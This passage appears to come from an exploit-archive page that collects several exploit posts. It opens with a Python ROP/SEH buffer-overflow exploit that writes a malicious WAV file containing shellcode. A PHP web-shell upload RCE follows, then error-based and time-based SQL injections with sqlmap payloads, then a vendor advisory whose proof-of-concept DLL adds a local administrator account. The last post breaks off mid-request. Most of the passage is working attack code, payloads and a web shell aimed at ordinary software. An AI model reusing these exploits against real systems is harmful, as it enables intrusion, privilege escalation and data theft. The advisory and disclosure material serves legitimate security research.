# MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** <br />ROP += b"A" * 4<br />ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)<br />ROP += struct.pack("<I", 0xffffff1c)<br />ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x41414141)*4<br />ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)<br />ROP += b"A" * 4<br /># ecx points to ZZZZ<br /><br />####################### 2. Get and set ZZZZ to HeapCreate ###########################<br />ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found) [Module : lame_enc.dll]<br />ROP += b"A" * 0x10<br />ROP += struct.pack("<I", 0x1003D058) # HEAPCREATE IAT<br />ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret ; (1 found) [Module : lame_enc.dll]<br />ROP += struct.pack("<I", 0x41414141)<br /># eax has HeapCreate<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br />ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]<br /><br />####################### 3. Set RET ###########################<br />ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x1001939e) # 0x1001939e: add esp, 0x000001A0 ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br /><br />####################### 4. Go to HeapCreate ###########################<br />ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **<br />ROP += b"A" * 8 <br />ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** <br />ROP += b"A" * 4<br />ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)<br />ROP += struct.pack("<I", 0xfffffea4)<br />ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x41414141)*4<br />ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x1002a3b5)*10 # 0x1002a3b5: ret ; (1 found) // pad it<br /># when heap create finishes, eax will have hHeap<br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)<br /><br />####################### 5. Get Stack Pointer to point to YYYY ###########################<br />ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **<br />ROP += b"A" * 8 <br />ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** <br />ROP += b"A" * 4<br />ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret ; (1 found)<br />ROP += struct.pack("<I", 0xfffffe58)<br />ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x41414141)*3<br />ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)<br />ROP += b"A" * 4<br /># ecx points to YYYY<br /><br />####################### 6. Get and set YYYY to HeapAlloc ###########################<br />ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found) [Module : lame_enc.dll]<br />ROP += b"A" * 0x10<br />ROP += struct.pack("<I", 0x1003D014) # HEAPALLOC IAT<br />ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret ; (1 found) [Module : lame_enc.dll]<br />ROP += struct.pack("<I", 0x41414141)<br /># eax has HeapCreate<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br />ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]<br /><br />####################### 7. Set RET ###########################<br />ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x10014d32) # 0x10014d32: add esp, 0x00000280 ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br />ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]<br /><br />####################### 8. Set hHEAP ###########################<br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found) <- should return here and start executing here<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br /><br />####################### 9. Go to HeapAlloc ###########################<br />ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **<br />ROP += b"A" * 8 <br />ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** <br />ROP += b"A" * 4<br />ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)<br />ROP += struct.pack("<I", 0xfffffdcc)<br />ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x41414141)*4<br />ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)<br /># when heap create finishes, eax will have hHeap<br />ROP += struct.pack("<I", 0x1002a3b5)*20 # 0x1002a3b5: ret ; (1 found) // pad it<br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)<br /><br />####################### 10. Get Stack Pointer to point to DDDD ###########################<br />ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **<br />ROP += b"A" * 8 <br />ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** <br />ROP += b"A" * 4<br />ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret ; (1 found)<br />ROP += struct.pack("<I", 0xfffffd5c)<br />ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x41414141)*3<br />ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found)<br />ROP += b"A" * 4<br /># ecx points to DDDD<br /><br />####################### 12. Set RET ###########################<br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)<br />ROP += b"A"*0x10<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]<br /><br />####################### 13. DESTIN ###########################<br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x100345ee)*8 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll]* <br /><br />####################### 14. SOURCE ###########################<br />ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **<br />ROP += b"A" * 8 <br />ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** <br />ROP += b"A" * 4<br />ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x000000a0)<br />ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x41414141)*4<br />ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** <br />ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found)<br /><br />####################### 15. GOTO _memcpy_s ###########################<br />ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte **<br />ROP += b"A" * 8 <br />ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** <br />ROP += b"A" * 4<br />ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found)<br />ROP += struct.pack("<I", 0xfffffc94)<br />ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found)<br />ROP += struct.pack("<I", 0x41414141)*4<br />ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found)<br /><br />####################### SHELLCODE ###########################<br />shellcode = b"\xcc" * 400<br />real_shellcode = b"\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b"<br />real_shellcode += b"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09"<br />real_shellcode += b"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d"<br />real_shellcode += b"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03"<br />real_shellcode += b"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81"<br />real_shellcode += b"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04"<br />real_shellcode += b"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03"<br />real_shellcode += b"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3"<br />real_shellcode += b"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68"<br />real_shellcode += b"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68"<br />real_shellcode += b"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9"<br />real_shellcode += b"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65"<br />real_shellcode += b"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01"<br />real_shellcode += b"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68"<br />real_shellcode += b"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68"<br />real_shellcode += b"\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68"<br />real_shellcode += b"\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57"<br />real_shellcode += b"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c"<br />real_shellcode += b"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78"<br />real_shellcode += b"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0"<br /><br />####################### CONSTRUCT ###########################<br />SIZE = 500<br />start_of_padding = b"A" * (SIZE-len(EXE)-len(shellcode))<br />start_of_padding += shellcode<br />start_of_padding += EXE<br /><br />SIZE = 1500<br />RET_NOP_TO_ROP = b"A" * 0x70 + struct.pack("I", 0x1003c6aa) * 10 # RET<br />#INT = struct.pack("I", 0x1000f2b3) + b"BBBB" # 0x1000f2b3: int3 ; pop esi ; ret ; (1 found)<br />INT = struct.pack("I", 0x1003c6aa)*2<br /><br />rest_of_payload = RET_NOP_TO_ROP + INT + ROP # 160 + 14*4 + 172<br />rest_of_payload += b"\x90" * 100<br />rest_of_payload += real_shellcode<br />rest_of_payload += b"\x90" * (SIZE-len(rest_of_payload))<br /><br />payload = junk + SEH + start_of_padding + rest_of_payload<br /><br />REST = b"\x44" * (size-len(payload))<br />payload += REST<br /><br />file = open("1.wav", "wb")<br />file.write(payload)<br />file.close()<br /> <br /></code></pre>
<pre><code># Exploit Title: Real Estate Management System v1.0 - Remote Code Execution via File Upload<br /># Date: 2/11/2024<br /># Exploit Author: Diyar Saadi<br /># Vendor Homepage: https://codeastro.com<br /># Version: V1.0<br /># Tested on: Windows 11 + XAMPP 8.0.30 + Burp Suite Professional v2023.12.1.3<br /><br /><br />## Description ## <br /><br />This Vulnerability allow the attacker to execute command injection payloads and upload malicious file into web server .<br /><br />-----------------------------------------------------------------------------------------------------------------------<br /><br /><br />## Simple RCE Payload : ##<br /><br /><html><br /><body><br /><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><br /><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><br /><input type="SUBMIT" value="Execute"><br /></form><br /><pre><br /><?php<br /> if(isset($_GET['cmd']))<br /> {<br /> system_payload($_GET['cmd']);<br /> }<br />?><br /></pre><br /></body><br /></html><br />-----------------------------------------------------------------------------------------------------------------------<br />## Steps to Reproduce ## <br /><br />1- Open Burp Suite ( Community + Professional ) + Click on Proxy Tab Then Enable Intercept By Clicking at Intercept is off .<br />2- Open The Browser From Proxy Tab Then Open The Resgister Web Page : http://localhost:8080/realestate/register.php<br />3- Prepare Your RCE PHP Script Base From Notepad or Any Editor Then Save the RCE PHP Script Base as : avatar.php filename . <br />4- Change The Filename extension into avatar.png , after save the RCE PHP Script .<br />5- Click Chose File From User Image Section Then Upload Your avatar.png file .<br />6- Click Register Then Back to Burp Suite Proxy Tab :<br />7- Modify File Extension Into Orginal File Extension that is : avatar.php in Example : Content-Disposition: form-data; name="uimage"; filename="avatar.png"<br />Content-Type: image/png . <br />8- After Modify The Content-Disposition From Burp Suite Proxy Tab Into Orginal File Extension Click Forward Button . <br />9- Open The Login Page : http://localhost:8080/realestate/login.php Then Register Through Your Account Email & Password .<br />10 - From MenuBar Click My Account & Profile Then Right Click at Image Icon > Copy Link > New Tab > Paste > Your Malicious Command is Ready To Execute .!<br /><br />-----------------------------------------------------------------------------------------------------------------------<br /><br /><br />## Burp Request : ##<br /><br />POST /realestate/register.php HTTP/1.1<br />Host: localhost<br />Content-Length: 1100<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywA99kZOAu8APGlhv<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/realestate/register.php<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />------WebKitFormBoundarypgW90eleiRxRzcEK<br />Content-Disposition: form-data; name="name"<br /><br />johnhamosh<br />------WebKitFormBoundarypgW90eleiRxRzcEK<br />Content-Disposition: form-data; name="email"<br /><br />rasu1l@in.com<br />------WebKitFormBoundarypgW90eleiRxRzcEK<br />Content-Disposition: form-data; name="phone"<br /><br />+199988764<br />------WebKitFormBoundarypgW90eleiRxRzcEK<br />Content-Disposition: form-data; name="pass"<br /><br /><html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html><br />------WebKitFormBoundarypgW90eleiRxRzcEK<br />Content-Disposition: form-data; name="utype"<br /><br />user<br />------WebKitFormBoundarypgW90eleiRxRzcEK<br />Content-Disposition: form-data; name="uimage"; filename="avatar.php"<br />Content-Type: image/png<br /><br /><html><br /><body><br /><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><br /><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><br /><input type="SUBMIT" value="Execute"><br /></form><br /><pre><br /><?php<br /> if(isset($_GET['cmd']))<br /> {<br /> system($_GET['cmd']);<br /> }<br />?><br /></pre><br /></body><br /></html><br />------WebKitFormBoundarypgW90eleiRxRzcEK<br />Content-Disposition: form-data; name="reg"<br /><br />Register<br />------WebKitFormBoundarypgW90eleiRxRzcEK--<br /><br />-----------------------------------------------------------------------------------------------------------------------<br /><br /><br />## PoC Simple RCE Through This Vulnerability : ##<br /><br />Directory of C:\xampp\htdocs\realestate\admin\user <br /> ..<br />02/11/2024 08:09 PM 315 avatar.php<br />02/11/2024 08:04 PM 315 avatar.png<br />02/11/2024 06:54 PM 9,376 avatarm2-min.jpg<br />02/11/2024 06:54 PM 13,186 avatarm7-min.jpg<br />02/11/2024 07:47 PM 1,814 avatars.php<br />02/11/2024 06:54 PM 1,313 gr7.png<br />02/11/2024 07:36 PM 28 poc.php<br /><br />-----------------------------------------------------------------------------------------------------------------------<br /><br /><br />## Video PoC : ##<br /><br />1- https://github.com/vulnerablecms/RCE-RealEstateVIDEOPOC/blob/main/PoC-RCE.mp4<br />2- https://gofile.io/d/AEWEgI<br />-----------------------------------------------------------------------------------------------------------------------<br /><br /><br />Greetz !<br /><br /></code></pre>
<pre><code># Exploit Title: XAMPP - Error Based SQL Injection<br /># Date: 02/2024<br /># Exploit Author: Andrey Stoykov<br /># Version: 5.6.40<br /># Tested on: Ubuntu 22.04<br /># Blog: http://msecureltd.blogspot.com<br /><br />Steps to Reproduce:<br /><br />1. Login to phpmyadmin<br />2. Visit Export > New Template > test > Create<br />3. Navigate to "Existing Templates"<br />4. Select template "test" and click "Update"<br />5. Trap HTTP POST request<br />6. Place single quote to "templateId" parameter<br /><br /><br />// HTTP POST request<br /><br />POST /phpmyadmin/tbl_export.php HTTP/1.1<br />Host: 192.168.159.128<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36<br />[...]<br /><br />ajax_request=true&server=1&db=&table=&exportType=server&templateAction=load&templateId=1'&_nocache=170904357625092438&token=%5D%7BwM4%22xq%26%3C%7Fioycy<br /><br /><br />// HTTP response<br /><br />HTTP/1.1 200 OK<br />Date: Tue, 27 Feb 2024 16:44:09 GMT<br />Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev<br />Perl/v5.16.3<br />X-Powered-By: PHP/5.6.40<br />[...]<br /><br />{"success":false,"error":"#1064 - You have an error in your SQL syntax;<br />check the manual that corresponds to your MariaDB server version for the<br />right syntax to use near '\\' AND `username` = 'root'' at line 1"}<br /><br />sqlmap -r request.txt --dbms=mysql --threads 10 --level 5 --risk 3<br />--fingerprint<br /><br />[...]<br />[16:55:00] [INFO] confirming MySQL<br />[16:55:01] [INFO] the back-end DBMS is MySQL<br />[16:55:01] [INFO] actively fingerprinting MySQL<br />[16:55:02] [INFO] executing MySQL comment injection fingerprint<br />web application technology: PHP 5.6.40, Apache 2.4.37<br />back-end DBMS: active fingerprint: MySQL >= 5.5<br /> comment injection fingerprint: MySQL 5.6.52<br /> fork fingerprint: MariaDB<br />[...]<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240226-0 ><br />=======================================================================<br /> title: Local Privilege Escalation via DLL Hijacking<br /> product: Qognify VMS Client Viewer<br /> vulnerable version: >=7.1<br /> fixed version: see solution<br /> CVE number: CVE-2023-49114<br /> impact: medium<br /> homepage: https://www.qognify.com/<br /> found: 2023-11-23<br /> by: Sandro Einfeldt (Office Munich)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Qognify, part of Hexagon, helps customers minimize the impact of security,<br />safety and operational incidents. Qognify’s comprehensive portfolio of video<br />management software and enterprise incident management solutions serve<br />thousands of customers around the world in manufacturing, transportation,<br />retail, education, finance, logistics, corrections, critical infrastructure<br />and government."<br /><br />Source: https://www.qognify.com/about-us/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a hardening guide for their customers which should be<br />implemented to ensure that no DLLs can be preloaded.<br /><br />SEC Consult highly recommends to perform a thorough security review of the product<br />conducted by security professionals to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Local Privilege Escalation via DLL Hijacking (CVE-2023-49114)<br />The Qognify VMS Client/Viewer application (VMS_Client.exe) is vulnerable to DLL<br />Hijacking. The application tries to load multiple DLL files from the DLL search<br />order without success. At least one of the missing DLL files can be hijacked.<br />This might allow malicious actors with low privileges on a Windows system to<br />escalate privileges if some specific pre-conditions are met:<br /><br />1. The attacker can drop a DLL file in a folder within the DLL search<br />order (This circumstance is based on a configuration issue in the Windows file<br />system permissions and is beyond the attacker's control.).<br />2. A high privileged user starts the VMS_Client.exe FAT client application.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Local Privilege Escalation via DLL Hijacking (CVE-2023-49114)<br />For successful exploitation, the attacker needs write-access to one of the<br />following directories in the DLL search order:<br /><br />1. The directory from which the application loaded<br />2. The system directory<br />3. The 16-bit system directory<br />4. The Windows directory<br />5. The current working directory (CWD)<br />6. The directories that are listed in the PATH environment variable<br /><br />The attacker can use the following malicious C-code to create a POC exploit:<br /><br />#include <windows.h><br />BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){<br /> if (dwReason == DLL_PROCESS_ATTACH){<br /> system("cmd.exe /C net user secconsult P@ssW0rd1sSup3rS6curE /add /Y");<br /> system("cmd.exe /C net localgroup administrators secconsult /add");<br /> ExitProcess(0);<br /> }<br /> return TRUE;<br />}<br /><br />The following command can be used to compile the code and create the DLL file:<br /><br />x86_64-w64-mingw32-gcc CRYPTBASE.c -shared -o CRYPTBASE.dll<br /><br />Next, the CRYPTBASE.dll file has to be dropped into one of the previously<br />mentioned folders of the DLL search order. If a user with local administrative<br />permissions starts the VMS Client/Viewer FAT client application, CRYPTBASE.dll<br />gets loaded and the malicious code gets executed with high privileges. In this<br />POC, the user 'secconsult' is created and added to the group of local<br />administrators. By following this approach, the attacker is able to escalate<br />privileges.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested which was the latest version available<br />at the time of the test:<br />* 7.2<br /><br />According to the vendor, all versions starting from 7.1 are affected. Users<br />should implement the hardening guide.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-01-17: Contacting vendor through supportCY@qognify.com<br />2024-01-17: Very quick vendor support response, asking for general information<br /> about the vulnerability, to be able to assign the correct internal<br /> team.<br />2024-01-17: Sending vendor short overview about the vulnerability.<br />2024-01-17: Vendor support forwards the information internally, we can submit<br /> the advisory unencrypted to the support email address.<br />2024-01-17: Submitting advisory.<br />2024-01-17: Vendor support acknowledges receipt of advisory.<br />2024-01-22: Responsible person at vendor contacts us, scheduling a meeting.<br />2024-01-22: Vendor support follows up if responsible person contacted us, closes<br /> support ticket.<br />2024-01-23: Meeting with vendor.<br />2024-02-09: Vendor response with detailed information regarding updated hardening<br /> guide.<br />2024-02-13: Follow-up questions regarding hardening guide & availability, affected<br /> version number, sending new advisory draft.<br />2024-02-21: Vendor: Sends link to PartnerWeb portal regarding guideline, confirms<br /> affected versions (>=7.1).<br />2024-02-22: Updating security advisory with new information, scheduling release<br /> for 26th February.<br />2024-02-26: Coordinated release of advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a hardening guide for their customers which should be<br />implemented to ensure that no DLLs can be preloaded.<br /><br />It can be found in the PartnerWeb portal of Qognify linked from here:<br />https://www.qognify.com/support-training/guides-documentation/<br />https://partner.qognify.com/qognify-vms/software-documentation/technical-guides/<br /><br /><br />Workaround:<br />-----------<br />Implement the hardening guide.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Sandro Einfeldt / @2024<br /><br /></code></pre>
<pre><code># Exploit Title: AC Repair and Services System v1.0 - Multiple SQL Injection<br /># Date: 27 December 2023<br /># Exploit Author: Gnanaraj Mauviel (@0xm3m)<br /># Vendor: oretnom23<br /># Vendor Homepage: https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-acrss.zip<br /># Version: v1.0<br /># Tested on: Mac OSX, XAMPP, Apache, MySQL<br /><br />-------------------------------------------------------------------------------------------------------------------------------------------<br /><br />Source Code(/php-acrss/admin/user/manage_user.php):<br /><br /><?php <br />if(isset($_GET['id'])){<br /> $user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");<br /> foreach($user->fetch_array() as $k =>$v){<br /> $meta[$k] = $v;<br /> }<br />}<br />?><br /><br />-> sqlmap -u "http://localhost/php-acrss/admin/?page=user/manage_user&id=" --batch<br />---<br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=user/manage_user&id=' AND (SELECT 5500 FROM (SELECT(SLEEP(5)))hiCZ) AND 'rZIs'='rZIs<br />---<br /><br />Source Code(/php-acrss/classes/Master.php):<br /><br />function delete_inquiry(){<br /> extract($_POST);<br /> $del = $this->conn->query("DELETE FROM `inquiry_list` where id = '{$id}'");<br /> if($del){<br /> $resp['status'] = 'success';<br /> $this->settings->set_flashdata('success'," Inquiry successfully deleted.");<br /> }else{<br /> $resp['status'] = 'failed';<br /> $resp['error'] = $this->conn->error;<br /> }<br /> return json_encode($resp);<br /><br /> }<br /><br />-> sqlmap -u "http://localhost/php-acrss/classes/Master.php?f=delete_inquiry" --data="id=*" --batch<br />---<br />Parameter: #1* ((custom) POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=' AND (SELECT 7930 FROM (SELECT(SLEEP(5)))XwlG) AND 'Jimw'='Jimw<br />---<br /><br />Source Code(/php-acrss/classes/Users.php):<br /><br />$qry = $this->conn->query("UPDATE users set $data where id = {$id}");<br /> if($qry){<br /> $this->settings->set_flashdata('success','User Details successfully updated.');<br /> foreach($_POST as $k => $v){<br /> if($k != 'id'){<br /> if(!empty($data)) $data .=" , ";<br /> if($this->settings->userdata('id') == $id)<br /> $this->settings->set_userdata($k,$v);<br /> }<br /> }<br /><br />POST /php-acrss/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />Content-Length: 943<br />sec-ch-ua: 